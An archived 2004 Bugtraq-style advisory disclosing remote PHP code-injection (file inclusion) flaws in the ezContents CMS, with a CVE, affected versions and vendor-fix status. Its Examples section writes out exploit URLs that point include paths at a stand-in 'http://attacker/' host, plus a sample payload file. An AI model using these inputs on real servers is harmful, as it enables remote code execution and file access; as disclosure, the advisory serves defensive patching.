lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 11 Feb 2004 00:20:49 +0100
From: Cedric Cochin <cco@...vigilance.com>
To: submissions@...ketstormsecurity.org, vuln@...unia.com,
	news@...uriteam.com, bugtraq@...urityfocus.com,
	bugs@...uritytracker.com
Subject: PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


	PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior

################################################################################
Summary :

ezContents a free open source content management system has been found to be
vulnerable to Multiple PHP Code Injection vulnerabilities.  They enable a
malicious user to access arbitrary files or execute commands on the server.

################################################################################
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* ezContents 2.0.2 and prior

CVE :
CAN-2004-0132

Release Date :
February 11, 2004

Severity :
HIGH

################################################################################
Examples :

		  -------------------------------------------
			 
http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/

Will import the following file into the PHP code.
- --> http://attacker/include/adodb/adodb.inc.php

Attacker just has to create the file adodb.inc.php as :
<? print "<?phpinfo();exit?>"?>

Idem with 

http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents

Will import the following file into the PHP code.
- --> http://attacker/ezContents/lang_admin.php

This vulnerability only applies when running ezContents on PHP version 4.3.0 or
above (prior versions did not support the inclusion of remote files); "URL
fopen wrappers" are enabled (the default); and with 'register_globals' set to
"On".

This vulnerability is present in a decent number of PHP files. The behavior of
version 2.0RC3 and 2.0.1 is approximatively the same. Some of the attack are
not working on the both due to different include() calls. (for example the
second one is not working on 2.0RC3 due to an additional "languages/" at the
beginning of the include call).

################################################################################
Vendor Status :

The information has been provided to ezContents Support Team.
A new release with fixes for these vulnerabilities is already available.
- --> http://www.ezcontents.org/forum/viewtopic.php?t=361

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAKWcjA9/8vqmWoYQRAkq6AJ9q00rfnDgZhxM+nc7CwkTserUSPQCglQ14
YpfZJvi3ulhpgu/r9dnEpF0=
=g3Xn
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists